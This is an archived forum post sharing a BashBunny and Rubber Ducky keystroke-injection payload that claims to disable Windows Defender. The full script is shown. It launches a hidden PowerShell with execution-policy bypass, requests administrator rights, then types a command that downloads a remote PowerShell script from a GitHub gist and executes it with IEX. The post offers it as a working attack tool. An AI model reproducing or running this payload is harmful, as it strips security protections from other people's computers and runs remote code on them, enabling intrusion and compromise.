InfoSecREDD Posted January 5, 2020 Share Posted January 5, 2020 DisableD3f3nd3r This payload was created out of frustration of people asking how to disable Windows Defender via BashBunny, Rubber-Ducky. I have released payloads for both devices. This is just a basic Powershell "Download String" function to pull from a public Gist/GitHub RAW code (or any other RAW code format). The script will attempt to escalate to Administrator to perform "Disabling Defender". Source Code of the Powershell Script:https://gist.github.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc The Payload: #!/bin/bash # # Title: Disable D3f3nd3r (BashBunny) # Description: This Payload disables Windows Defender using Powershell, Works also for the Hak5 # Rubber Ducky or any HID device that supports Quacking. # Author: REDD of Private-Locker # Version: 1.0 # Category: Disable Security # Target: Windows # # Source: https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1 # LED SETUP ATTACKMODE HID LED ATTACK RUN WIN "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"Start-Process cmd -A '/t:4f'-Verb runAs\"" Q LEFTARROW; Q ENTER; Q STRING "powershell -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1');\"" Q ENTER; sleep 1; Q STRING "exit"; Q ENTER; LED FINISH Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.